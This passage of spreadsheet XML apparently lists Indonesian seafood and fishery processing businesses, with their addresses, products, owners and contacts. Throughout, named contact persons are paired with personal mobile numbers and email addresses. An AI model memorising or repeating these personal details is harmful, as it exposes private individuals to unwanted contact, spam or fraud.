    <t>3-4 Ulu</t>
  </si>
  <si>
    <t>pempekrizky.palembang@gmail.com</t>
  </si>
  <si>
    <t>0711-515608</t>
  </si>
  <si>
    <t>DEWI YULIANTI 085273537536</t>
  </si>
  <si>
    <t>PT. SEA SIX ENERGY INDONESIA</t>
  </si>
  <si>
    <t>Jl. Ketut Sanggra No.66, Kel. Patas, Kec. Gerokgak, Kabupaten Buleleng</t>
  </si>
  <si>
    <t>Butiran Rumput Laut Kering, Ekstrak Rumput Laut</t>
  </si>
  <si>
    <t>agus sastra wiguna</t>
  </si>
  <si>
    <t>Patas</t>
  </si>
  <si>
    <t>agus@sea6energy.com</t>
  </si>
  <si>
    <t>agus sastra 085333929814</t>
  </si>
  <si>
    <t>PT. PAHALA BAHARI NUSANTARA</t>
  </si>
  <si>
    <t>Perum PPSJ Blok O, Kavling 5-6 Room 6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>erlanridha45@gmail.com</t>
  </si>
  <si>
    <t>021-6694846</t>
  </si>
  <si>
    <t>ERLAN RIDHA ISWARA 089633544191</t>
  </si>
  <si>
    <t>PT. OCEAN CHAMP SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Kima 7 Kav J-2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>TUTI HARJATI OENANG</t>
  </si>
  <si>
    <t>oceanchampseafood@yahoo.com</t>
  </si>
  <si>
    <t>0411-514827</t>
  </si>
  <si>
    <t>Lilis V. S. 082191077414</t>
  </si>
  <si>
    <t>PT. ADIB LABUH INDRALOKA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Gudang 9 Blok BG - BH Room 1, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Sundari Putri F</t>
  </si>
  <si>
    <t>pt.adiblabuhindraloka@gmail.com</t>
  </si>
  <si>
    <t>021-22432160</t>
  </si>
  <si>
    <t>Raali 081311479345</t>
  </si>
  <si>
    <t>PT. KELOLA LAUT NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Raya Pati-Juwana Km 5,3, Kel. Widorokandang, Kec. Pati, Kabupaten Pati</t>
  </si>
  <si>
    <t>Beku, Lumatan Daging</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Hiu Beku, Cephalopoda Beku, Otoshimi Beku</t>
  </si>
  <si>
    <t>Siti Tazkiyah</t>
  </si>
  <si>
    <t>Widorokandang</t>
  </si>
  <si>
    <t>kelolanusantara@gmail.com</t>
  </si>
  <si>
    <t>0295-4199095</t>
  </si>
  <si>
    <t>M. Ainun Najih ( 085327205758)</t>
  </si>
  <si>
    <t>M. Ainun Najih</t>
  </si>
  <si>
    <t>PT. INDOKULINA SARANA UTAMA</t>
  </si>
  <si>
    <t>Jl. Milenium II Blok F4 No.3 Room 4, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Salmon Beku, Trout Beku, Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>Juard effendi</t>
  </si>
  <si>
    <t>indokulina.isu@gmail.com</t>
  </si>
  <si>
    <t>021-22106380</t>
  </si>
  <si>
    <t>Muhammad Iqbal Nasrullah (081291646660)</t>
  </si>
  <si>
    <t>Muhammad Iqbal Nasrullah</t>
  </si>
  <si>
    <t>PT. MITRA TIMUR NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya Lr 3 No.9, Kel. Buloa, Kec. Tallo, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Tuna Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>H. Mustari</t>
  </si>
  <si>
    <t>Buloa</t>
  </si>
  <si>
    <t>mtn.mks15@gmail.com</t>
  </si>
  <si>
    <t>Islah, 082188313953</t>
  </si>
  <si>
    <t>PT. INDOCITRA JAYA SAMUDERA</t>
  </si>
  <si>
    <t>Jl. Gatot Kaca No.88, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>IBNU ISWORO TJOA</t>
  </si>
  <si>
    <t>indocitrajs@yahoo.com</t>
  </si>
  <si>
    <t>0365-41915</t>
  </si>
  <si>
    <t>I MADE WITANYA SEMARA,SE &amp; 081337242038</t>
  </si>
  <si>
    <t>UD. RIKI UTAMA MANDIRI</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Safe N Lock V2-3328, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Fillet Hiu Beku, Ikan Hasil Budidaya Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>SUKIS WIDJAJANTI</t>
  </si>
  <si>
    <t>Rangkah Kidul</t>
  </si>
  <si>
    <t>rum.seafoods5@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Kawasan Industri dan Pergudangan Safe N Lock V2-3328 </t>
  </si>
  <si>
    <t>SUNARYO</t>
  </si>
  <si>
    <t>KIM TJUNG</t>
  </si>
  <si>
    <t>Jl. Pelantar Asam/KUD No.120, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>angello705263@gmail.com</t>
  </si>
  <si>
    <t>TONY 085263638687</t>
  </si>
  <si>
    <t>PT. WIRAGUNA JAYA MAKMUR</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Blok C No.6, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>IR R UNA RUSMANA</t>
  </si>
  <si>
    <t>wiragunajm@yahoo.com</t>
  </si>
  <si>
    <t>021-6681741</t>
  </si>
  <si>
    <t>IR R UNA RUSMANA 081286010160</t>
  </si>
  <si>
    <t>PT. PANORAMA LAUT INDAH</t>
  </si>
  <si>
    <t>Jl. Lintas Parado, Kel. Naru, Kec. Woha, Kabupaten Bima</t>
  </si>
  <si>
    <t>Ruslin</t>
  </si>
  <si>
    <t>Woha</t>
  </si>
  <si>
    <t>Naru</t>
  </si>
  <si>
    <t>ruslibima27@gmail.com</t>
  </si>
  <si>
    <t>085205025971 Ruslin</t>
  </si>
  <si>
    <t>PT. SOUTH SUCO</t>
  </si>
  <si>
    <t>Jl. Kima VI Blok G-4, Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Andri Febrianto Tansil</t>
  </si>
  <si>
    <t>ptsouthsuco@gmail.com</t>
  </si>
  <si>
    <t>0411-510215, 0411-510100</t>
  </si>
  <si>
    <t xml:space="preserve">Nikolas Tangkeallo, HP : 082349569782  </t>
  </si>
  <si>
    <t>CV. REZEKI KITA</t>
  </si>
  <si>
    <t>Jl. Raya Gabion Lorong Sawita No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>OK MUHAMMAD RIDHO</t>
  </si>
  <si>
    <t>cv.rezekikita@yahoo.co.id</t>
  </si>
  <si>
    <t>061-6943978</t>
  </si>
  <si>
    <t>Muhammad Ridho (081368138702)</t>
  </si>
  <si>
    <t>PT. ESCO CHEMICALS MITRA UTAMA</t>
  </si>
  <si>
    <t>Jl. Pemda Tigaraksa, Gudang Bizpoin Blok E No.38, Kel. Sukamulya, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Refined Carrageenan, Nori</t>
  </si>
  <si>
    <t>IRVAN HERIANTO</t>
  </si>
  <si>
    <t>escochem@cbn.net.id</t>
  </si>
  <si>
    <t>PT. RED RIBBON INDONESIA</t>
  </si>
  <si>
    <t>Jl. KL Yos Sudarso KM 10,5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Udang Beku, Paha Kodok Beku</t>
  </si>
  <si>
    <t>IDRIS MARPAULI</t>
  </si>
  <si>
    <t>rricom@indo.net.id</t>
  </si>
  <si>
    <t>061-6851350</t>
  </si>
  <si>
    <t>VERONICA SILLOUX</t>
  </si>
  <si>
    <t>PT. PAPUA FISHINDO JAYA</t>
  </si>
  <si>
    <t>Jl. Perikanan RT 002 RW 004, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demesal Beku</t>
  </si>
  <si>
    <t>ABD RAJAB ST</t>
  </si>
  <si>
    <t>ansharalthaf@gmail.com</t>
  </si>
  <si>
    <t>0951-3171299</t>
  </si>
  <si>
    <t>ABD RAJAB 082112761786</t>
  </si>
  <si>
    <t>PT. ANUGERAH SAMUDERA HINDIA</t>
  </si>
  <si>
    <t>Jl. Letjen Gatot Subroto No.106, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>Tuna Loin Masak Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>TJIPTO AMAT</t>
  </si>
  <si>
    <t>marketing@asahifishery.com</t>
  </si>
  <si>
    <t>0631-21055</t>
  </si>
  <si>
    <t>MAULID HARFIN HUTAGALUNG, S.St.Pi / 085262186664</t>
  </si>
  <si>
    <t>SUN HUI,SE</t>
  </si>
  <si>
    <t>PT. SEKAR KATOKICHI</t>
  </si>
  <si>
    <t>Jl. Jenggolo 2/17 Gedung A, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Berlapis Tepung Beku, Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>HARRY LUKMITO</t>
  </si>
  <si>
    <t>qc_skt@yahoo.com</t>
  </si>
  <si>
    <t>031-8963611/12</t>
  </si>
  <si>
    <t>ANNA FREDERIKA &amp; 083873924704</t>
  </si>
  <si>
    <t>AGUS SANDI SURYA</t>
  </si>
  <si>
    <t>PT. IRIAN MARINE PRODUCT DEVELOPMENT</t>
  </si>
  <si>
    <t>Jl. Udang Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>risna.astuty@gmail.com</t>
  </si>
  <si>
    <t>0951-3171044</t>
  </si>
  <si>
    <t>RISNA D. ASTUTY 082239444400/ NURCHAYATI 0818725435</t>
  </si>
  <si>
    <t>PT. JAYA SAKTI CIREBON</t>
  </si>
  <si>
    <t>Jl. Belanak No. 39, Kel. Panjunan, Kec. Lemahwungkuk, Kota Cirebon</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku, Rajungan Beku</t>
  </si>
  <si>
    <t>EMRAN TASMAN</t>
  </si>
  <si>
    <t>Panjunan</t>
  </si>
  <si>
    <t>JOKO.TASMAN@JAYASAKTI.CO.ID</t>
  </si>
  <si>
    <t>0231 - 208525</t>
  </si>
  <si>
    <t>JOKO TASMAN &amp; 08122212885</t>
  </si>
  <si>
    <t>JOKO TASMAN</t>
  </si>
  <si>
    <t>PT. AQUAFARM NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Dusun VII, Kel. Naga Kisar, Kec. Pantai Cermin, Kabupaten Serdang Bedagai</t>
  </si>
  <si>
    <t>Fillet Nila Beku, Nila Bernilai Tambah Beku, Fillet Nila Segar</t>
  </si>
  <si>
    <t>SRI RUSMIANAWATI</t>
  </si>
  <si>
    <t>Pantai Cermin</t>
  </si>
  <si>
    <t>Naga Kisar</t>
  </si>
  <si>
    <t>salamagurning@gmail.com</t>
  </si>
  <si>
    <t>061-42075777</t>
  </si>
  <si>
    <t>Salama Gurning (  08126433359 )</t>
  </si>
  <si>
    <t>CV. TALAUD IKAN MANDIRI</t>
  </si>
  <si>
    <t>Jl. Trans Mala, Lingkungan IV Blok R No.15, Kel. Melonguane Timur, Kec. Melonguane, Kabupaten Kepulauan Talaud</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>BOY RODNEY KEMBAU</t>
  </si>
  <si>
    <t>Melonguane</t>
  </si>
  <si>
    <t>Melonguane Timur</t>
  </si>
  <si>
    <t>rizki_rizaldi@cvtim.com</t>
  </si>
  <si>
    <t>RIZKY RIZALDI</t>
  </si>
  <si>
    <t>KOPERASI MINA RIZKI ABADI</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Muara Baru, Jl. Muara Baru Raya No.30 Blok C7 - C8, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Rusman B Ghazali</t>
  </si>
  <si>
    <t>supiyati@komira.co.id</t>
  </si>
  <si>
    <t>021-66604649</t>
  </si>
  <si>
    <t>Andi Syamsu Alam 085218322199</t>
  </si>
  <si>
    <t>Muh Firdaus</t>
  </si>
  <si>
    <t>PT. SUTRACO NUSANTARA MEGAH</t>
  </si>
  <si>
    <t>Pattene 88 Cluster Green Park Blok C18-C20, Kel. Temmappaduae, Kec. Marusu, Kabupaten Maros</t>
  </si>
  <si>
    <t>REVIE CHRISTIANTO GOZALI</t>
  </si>
  <si>
    <t>Temmappaduae</t>
  </si>
  <si>
    <t>lady@sutraco.com</t>
  </si>
  <si>
    <t>LIDIA TUNRU &amp; 082131756301</t>
  </si>
  <si>
    <t>PT. SUKSES HASIL ALAM NUSAINDO</t>
  </si>
  <si>
    <t>Jl. Kima 9 Kav L No. 11 C, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Udang Kipas Beku, Ikan Pelagis Beku, Cephalopoda Beku, Tuna Beku, Tuna Segar, Udang Beku, Udang Segar</t>
  </si>
  <si>
    <t>EFFENDI SOEGIONO</t>
  </si>
  <si>
    <t>ptshanindo@gmail.com</t>
  </si>
  <si>
    <t>EFFENDI SOEGIONO.TELP 08558880788</t>
  </si>
  <si>
    <t>HARYONO SOEGIONO</t>
  </si>
  <si>
    <t>PT. MULTI MONODON INDONESIA</t>
  </si>
  <si>
    <t>Jl. Kima Raya I Blok D-2B, Kel. Kapasa, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>MARTHEN MONINGKA,  SH</t>
  </si>
  <si>
    <t>Kapasa  Raya</t>
  </si>
  <si>
    <t>angganurdin@gmail.com</t>
  </si>
  <si>
    <t>0411-511501, 0411-512639</t>
  </si>
  <si>
    <t>JAMIAT RIADI &amp; 081242774117</t>
  </si>
  <si>
    <t>JAMIAT RIADI</t>
  </si>
  <si>
    <t>PT. ORIENS PRIMA LESTARI</t>
  </si>
  <si>
    <t>Jl. Raya Mundupesisir No.34, Kel. Mundupesisir, Kec. Mundu, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Paha Kodok Beku, Scallop Beku, Cephalopoda Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku</t>
  </si>
  <si>
    <t>Piet Boentaran</t>
  </si>
  <si>
    <t>Mundupesisir</t>
  </si>
  <si>
    <t>oriensprima@gmail.com</t>
  </si>
  <si>
    <t>0231-510333</t>
  </si>
  <si>
    <t>Deny Setiawan  (085224004117)</t>
  </si>
  <si>
    <t>FRANKY</t>
  </si>
  <si>
    <t>Jl. Setia Budhi RT 004 RW 001, Kel. Sungai Lakam, Kec. Karimun, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Karimun</t>
  </si>
  <si>
    <t>Sungai Lakam</t>
  </si>
  <si>
    <t>chiafranky99@gmail.com</t>
  </si>
  <si>
    <t>0777-31234</t>
  </si>
  <si>
    <t>Franky &amp; 077731234</t>
  </si>
  <si>
    <t>Franky</t>
  </si>
  <si>
    <t>ANDI</t>
  </si>
  <si>
    <t>Jl. Kampung Baru No.74 RT 004 RW 002, Kel. Sungai Lakam Timur, Kec. Karimun, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Sungai Lakam Timur</t>
  </si>
  <si>
    <t>jienleong28@gmail.com</t>
  </si>
  <si>
    <t>KARDIM</t>
  </si>
  <si>
    <t>Jl. Pelantar KUD No.98, Kel. Tanjungpinang, Kec. Tanjungpinang, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Tanjungpinang</t>
  </si>
  <si>
    <t>kardim4025@gmail.com</t>
  </si>
  <si>
    <t>KARDIM 08127064025</t>
  </si>
  <si>
    <t>CV. BANDAR KARIMUN</t>
  </si>
  <si>
    <t>Jl. Irawan Matress No.18 Batu Lipai, Kel. Baran, Kec. Meral, Kabupaten Karimun</t>
  </si>
  <si>
    <t>EFFENDY. L</t>
  </si>
  <si>
    <t>Meral</t>
  </si>
  <si>
    <t>Baran</t>
  </si>
  <si>
    <t>bkm_group18@yahoo.com</t>
  </si>
  <si>
    <t>ARIFIN / 081372024132</t>
  </si>
  <si>
    <t>PT. MEGASETIA AGUNG KIMIA</t>
  </si>
  <si>
    <t>Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Reduksi, Lainnya, -</t>
  </si>
  <si>
    <t>Minyak Ikan, Tepung Rumput Laut, Minyak Hati Cod, Tepung Alga Spirulina</t>
  </si>
  <si>
    <t>SUTEDJA SIDARTA</t>
  </si>
  <si>
    <t>Cilincing</t>
  </si>
  <si>
    <t>Rorotan</t>
  </si>
  <si>
    <t>wahyu.sugiyarto@megasetia.com</t>
  </si>
  <si>
    <t>Wahyu Sugiyarto - 085697798967</t>
  </si>
  <si>
    <t>SURYANI HARTOYO</t>
  </si>
  <si>
    <t>PT. SAMUDRA PERKASA ABADI</t>
  </si>
  <si>
    <t>Jl. Letjend Gatot Subroto, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>Lobster Air Tawar Beku</t>
  </si>
  <si>
    <t>ANDY WILLIAM ALI</t>
  </si>
  <si>
    <t>legal@spafishery.com</t>
  </si>
  <si>
    <t>0631-26560</t>
  </si>
  <si>
    <t>ANDY WILLIAM ALI &amp; 0811656588</t>
  </si>
  <si>
    <t>CV. MESTA ALAM</t>
  </si>
  <si>
    <t>Jl. Sukomanunggal No.179 Blok F2-F3, Kel. Sukomanunggal, Kec. Sukomanunggal, Kota Surabaya</t>
  </si>
  <si>
    <t>NUR FADILLAH</t>
  </si>
  <si>
    <t>Sukomanunggal</t>
  </si>
  <si>
    <t>cv.mestaalam@gmail.com</t>
  </si>
  <si>
    <t>NUR FADILLAH 08123353472</t>
  </si>
  <si>
    <t>UD. JAWA MADURA</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Kepiting Beku, Ikan Hasil Budidaya Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>H SUBIANTORO</t>
  </si>
  <si>
    <t>contact.jawamadura@gmail.com</t>
  </si>
  <si>
    <t>HARRY SOEKARTONO 081231523131</t>
  </si>
  <si>
    <t>PABRIK DUA SURYA ALAM TUNGGAL PT.</t>
  </si>
  <si>
    <t>Jl. Raya Tropoda Depan 126 B, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>RACHMAT GUNAWAN</t>
  </si>
  <si>
    <t>anton.sg@ptsaa.com</t>
  </si>
  <si>
    <t>031-8667575</t>
  </si>
  <si>
    <t>LAY HUAT</t>
  </si>
  <si>
    <t>Kampung Jati RT 002 RW 001, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>layhuatskp@gmail.com</t>
  </si>
  <si>
    <t>Lay Huat / 081275215222</t>
  </si>
  <si>
    <t>UD. LYVIA NUSA BOGA</t>
  </si>
  <si>
    <t>Griya Paniki Indah, Kel. Kairagi, Kec. Mapanget, Kota Manado</t>
  </si>
  <si>
    <t>Sambal Roa, Abon Ikan</t>
  </si>
  <si>
    <t>SURIANA</t>
  </si>
  <si>
    <t>Kairagi</t>
  </si>
  <si>
    <t>surianaoi79@gmail.com</t>
  </si>
  <si>
    <t>085299869323 YANA</t>
  </si>
  <si>
    <t>PT. SUMBERGUNA MAKASARNUSA</t>
  </si>
  <si>
    <t>Jl. Ujung Pandang Baru No.17, Kel. La'latang, Kec. Tallo, Kota Makassar</t>
  </si>
  <si>
    <t>Utama Rusli</t>
  </si>
  <si>
    <t>La'latang</t>
  </si>
  <si>
    <t>sumberguna@gmail.com</t>
  </si>
  <si>
    <t>0411-3621770</t>
  </si>
  <si>
    <t>Danni Ekaputra (085341468701)</t>
  </si>
  <si>
    <t>Muh. Niswar SM</t>
  </si>
  <si>
    <t>KARYA LELUHUR</t>
  </si>
  <si>
    <t>Desa Banteng RT 03 No.75, Kec. Pangkalan Baru, Kabupaten Bangka Tengah</t>
  </si>
  <si>
    <t>Kemplang Cumi-cumi, Kemplang Ikan, Kerupuk Ikan</t>
  </si>
  <si>
    <t>MARIO</t>
  </si>
  <si>
    <t>Pangkalan Baru</t>
  </si>
  <si>
    <t>Banteng</t>
  </si>
  <si>
    <t>karyaleluhur@yahoo.com</t>
  </si>
  <si>
    <t>MARIO 085273480229</t>
  </si>
  <si>
    <t>PT. PIALA SEAFOOD INDONESIA</t>
  </si>
  <si>
    <t>Kampung Tapiri, Kel. Kaibus, Kec. Teminabuan, Kabupaten Sorong Selatan</t>
  </si>
  <si>
    <t>LUKMAN YUSUF</t>
  </si>
  <si>
    <t>Teminabuan</t>
  </si>
  <si>
    <t>Kaibus</t>
  </si>
  <si>
    <t>lukmanpiala@yahoo.com</t>
  </si>
  <si>
    <t>Lukman 08124834091</t>
  </si>
  <si>
    <t>CV. DSA BUANA KALIMANTAN</t>
  </si>
  <si>
    <t>Jl. Banjar No.66 RT 27, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t>M. Yasir</t>
  </si>
  <si>
    <t>dsabuanakalimantan@gmail.com</t>
  </si>
  <si>
    <t>M. Yasir/081346280305</t>
  </si>
  <si>
    <t>PT. SARI LAUT JAYA FOOD PRODUCTS</t>
  </si>
  <si>
    <t>Jl. Sampangan B1/A, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Reduksi, Kaleng</t>
  </si>
  <si>
    <t>Tepung Ikan, Sarden Kaleng, Makerel Kaleng</t>
  </si>
  <si>
    <t>ANDOJO</t>
  </si>
  <si>
    <t>fury@sarilautjaya.com</t>
  </si>
  <si>
    <t>0333-593322</t>
  </si>
  <si>
    <t>ANDOJO / 082330176067</t>
  </si>
  <si>
    <t>PT. MULTI PRIMA ABADI MAS</t>
  </si>
  <si>
    <t>Komplek CBD Blok C1 No.11 RT 014 RW 007, Kel. Cengkareng Timur, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Hendri Tjahjono</t>
  </si>
  <si>
    <t xml:space="preserve">Cengkareng </t>
  </si>
  <si>
    <t>Cengkareng Timur</t>
  </si>
  <si>
    <t>zacky.warakas@gmail.com</t>
  </si>
  <si>
    <t>021-2252 2121</t>
  </si>
  <si>
    <t>Abdul Zakiah Mahmud / 0895339117376</t>
  </si>
  <si>
    <t>Hendra Tjahjono</t>
  </si>
  <si>
    <t>PT. KENCANA BUMI SUKSES</t>
  </si>
  <si>
    <t>Pulau Nipah Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam</t>
  </si>
  <si>
    <t>WAHYUDI FIRDAUS</t>
  </si>
  <si>
    <t>Pulau Setokok</t>
  </si>
  <si>
    <t>kbsbatam@yahoo.com</t>
  </si>
  <si>
    <t>0778-4092264</t>
  </si>
  <si>
    <t>WAHYUDI FIRDAUS / 081270009996</t>
  </si>
  <si>
    <t>PT. SORBY INTERNATIONAL MEDAN</t>
  </si>
  <si>
    <t>Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Rajungan Beku, Cephalopoda Beku, Udang Beku, Kerang Beku, Tuna Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>TONG PENG</t>
  </si>
  <si>
    <t>acunwhatsapp@gmail.com</t>
  </si>
  <si>
    <t>061-6851854</t>
  </si>
  <si>
    <t>HORCUN 081376271156 dan 0811659206</t>
  </si>
  <si>
    <t>HORCUN</t>
  </si>
  <si>
    <t>PT. AGUNG MULIA CHEMINDO</t>
  </si>
  <si>
    <t>Prima Centre 1 Blok I No.3 RT 009 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Tepung Ikan, Tepung Salmon, Tepung Udang, Tepung Teri, Tepung Kod, Tepung Cumi-cumi</t>
  </si>
  <si>
    <t>STEVEN SUNJAYA</t>
  </si>
  <si>
    <t>egaamc11@gmail.com</t>
  </si>
  <si>
    <t>021-29671393</t>
  </si>
  <si>
    <t xml:space="preserve">SILVIA AGUSTINUS &amp; 0818186187 </t>
  </si>
  <si>
    <t>SUKIRMAN ALS TIEN SHE</t>
  </si>
  <si>
    <t>Kp. Suka Maju RT 004 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>sukirmantienshe@gmail.com</t>
  </si>
  <si>
    <t>SUKIRMAN ALS TIEN SHE / 081261265648</t>
  </si>
  <si>
    <t>PT. BAHTERA CAHAYA NUSANTARA</t>
  </si>
  <si>
    <t>Jl. Gabion Belawan Komplek PPS, Kel. Bagan Deli, Kec. Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Husin</t>
  </si>
  <si>
    <t xml:space="preserve">Belawan </t>
  </si>
  <si>
    <t>rizkinasution46@yahoo.com</t>
  </si>
  <si>
    <t>Freddy M.Simanjuntak</t>
  </si>
  <si>
    <t>PT. USAHA LAUT PANIPAHAN</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.2, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Hiu Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>ASTUTI</t>
  </si>
  <si>
    <t>hamkasyahrir@gmail.com</t>
  </si>
  <si>
    <t>021-22672597</t>
  </si>
  <si>
    <t xml:space="preserve">David </t>
  </si>
  <si>
    <t>SHINTA</t>
  </si>
  <si>
    <t>SUDIRMAN</t>
  </si>
  <si>
    <t>Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>upisudirmanskp2019@gmail.com</t>
  </si>
  <si>
    <t>Sudirman / 081223528899</t>
  </si>
  <si>
    <t>UD. GARINDO</t>
  </si>
  <si>
    <t>Jl. Sutomo Baru No.88, Kel. Pandau Hilir, Kec. Medan Perjuangan, Kota Medan</t>
  </si>
  <si>
    <t>Japis</t>
  </si>
  <si>
    <t>Medan Perjuangan</t>
  </si>
  <si>
    <t>Pandau Hilir</t>
  </si>
  <si>
    <t>garindo@yahoo.com</t>
  </si>
  <si>
    <t>061-4516290</t>
  </si>
  <si>
    <t>Nuridah / 085275012740</t>
  </si>
  <si>
    <t>THIAM LIAN</t>
  </si>
  <si>
    <t>Kp. Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>thiamlian2110@gmail.com</t>
  </si>
  <si>
    <t>THIAM LIAN / 08127769081</t>
  </si>
  <si>
    <t>PT. INDOKING ANEKA AGAR AGAR INDUSTRI</t>
  </si>
  <si>
    <t>Jl. Inpres Pasar II, Kel. Tanjung Gusta, Kec. Sunggal, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>TOMAS HALIM</t>
  </si>
  <si>
    <t>Sunggal</t>
  </si>
  <si>
    <t>Tanjung Gusta</t>
  </si>
  <si>
    <t>info@indoking.co.id</t>
  </si>
  <si>
    <t>061-4522811</t>
  </si>
  <si>
    <t>JULIANA - 087766482887</t>
  </si>
  <si>
    <t>SIALANG CUPU GADING</t>
  </si>
  <si>
    <t>Jambi</t>
  </si>
  <si>
    <t>Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi</t>
  </si>
  <si>
    <t>Abon Lele, Krispy Kulit Lele, Kerupuk Lele, Kerupuk Tulang Lele, Nila Krispy, Stik Ikan</t>
  </si>
  <si>
    <t>SUPRAWOTO</t>
  </si>
  <si>
    <t>Sekernan</t>
  </si>
  <si>
    <t>Tunas Baru</t>
  </si>
  <si>
    <t>sialangcupugading@yahoo.com</t>
  </si>
  <si>
    <t>SUPRAWOTO 0853660109</t>
  </si>
  <si>
    <t>PT. PABRIK LAMONGAN BMI</t>
  </si>
  <si>
    <t>Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan</t>
  </si>
